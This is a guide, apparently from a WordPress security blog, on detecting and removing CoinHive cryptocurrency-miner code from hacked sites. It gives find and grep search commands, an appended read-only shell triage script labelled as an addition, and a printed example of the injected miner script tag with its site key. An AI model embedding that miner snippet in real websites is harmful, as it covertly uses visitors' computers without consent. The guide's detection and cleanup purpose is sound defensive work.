Coinhive script clean up from hacked website

How To Clean Up CoinHive Miner Code From The Hacked WordPress Website?

We have noticed that a massive number of hacked WordPress websites are being used for Monero cryptocurrency mining. Hackers use CoinHive – a Monero cryptocurrency mining program written in JavaScript. When embedded into your site, this program mines cryptocurrency by borrowing your website visitors’ computer resources. If you have noticed this, we recommend performing the steps outlined below to clear the CoinHive mining code from your website.

Identify modified files

The first thing to do is to identify which files have been changed. You can do this in several ways:

  • Connect to the server (if possible) and run the command “find ./ -type f -mtime -10”, where -10 limits the results to files modified within the last 10 days.
  • Use the FileZilla program. First, choose Server -> Search remote files… In the window that opens, select search conditions -> date, after, and enter the date, e.g. 10 days earlier than today.
  • Contact your hosting provider. If you can’t access your server, you can contact your hosting administrator and ask for help.

If you do not find any modified files, it is possible that the CoinHive mining code has been loaded into the database. In this case, you should search for the “CoinHive” keyword in your database tables. If you have access to phpMyAdmin, use the Search tool, or connect to the server and search with an SQL LIKE query.

View modified files

There should be CoinHive code in the modified files. If all the files look clean, then try searching for the “coinhive” keyword in all the website files. How to do this:

  • If you have access to the server, use the following command: grep -rnw '/' -e 'coinhive' (here '/' is the directory to search; point it at your website directory to avoid scanning the whole server).
  • If you are not able to access the server, you can use a code editor such as Notepad++. Select “Search text string in all files and folders” and start searching.

Clean up CoinHive code

Code example:

<script src='https://coinhive.com/lib/coinhive.min.js' type='text/javascript'></script>
<script>var miner = new CoinHive.Anonymous('TnKJQivLdI92CHM5VDumyS'); miner.start();</script>

Remember that the TnKJQivLdI92CHM5VDumyS part of the CoinHive JavaScript miner code is used to identify the user of the script and may vary. You can also take a look at our removal guide here: How To Clean A Hacked WordPress Site On Your Own
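
The checks above combined into one read-only script, as an added example that is not part of the original guide: it lists files that mention CoinHive in any letter case, marks which of them changed within the chosen number of days, and pulls out the site keys it finds. The function names and the 10-day default are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original article): read-only triage of a site
# directory for CoinHive injections. Nothing is modified or deleted.

# Files under DIR changed in the last DAYS days (the article's find -mtime check).
recent_files() {
    find "$1" -type f -mtime "-$2" 2>/dev/null | sort
}

# Files containing the keyword in any letter case ("coinhive", "CoinHive").
coinhive_files() {
    grep -rli -e 'coinhive' "$1" 2>/dev/null | sort
}

# Distinct site keys passed to CoinHive.<Name>('KEY'). The key differs per
# attacker, so match its shape instead of one literal value.
site_keys() {
    grep -rhoiE "coinhive\.[a-z]+\([\"'][a-z0-9]+[\"']" "$1" 2>/dev/null |
        sed -E "s/.*\([\"']([A-Za-z0-9]+)[\"']\$/\1/" | sort -u
}

# One line per matching file: "recent" if it also falls inside the mtime
# window, "older" if not. Modification times can be reset, so "older" only
# means the file would have been missed by the date search.
triage() {
    recent=$(recent_files "$1" "$2")
    coinhive_files "$1" | while IFS= read -r f; do
        if printf '%s\n' "$recent" | grep -qxF -- "$f"; then
            echo "recent $f"
        else
            echo "older $f"
        fi
    done
}

# Usage: sh triage.sh /path/to/website [days]
if [ $# -ge 1 ]; then
    triage "$1" "${2:-10}"
    site_keys "$1"
fi
```

Files reported as “older” are the reason to run the keyword search even when the date search finds nothing.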

Reduce the risk so that it does not happen again

Change your hosting, database and FTP passwords. Change the passwords for all users and make sure all of them are strong. Update WordPress and all plugins, and make sure the plugins you use do not have security holes – use our database.

Rasa A.
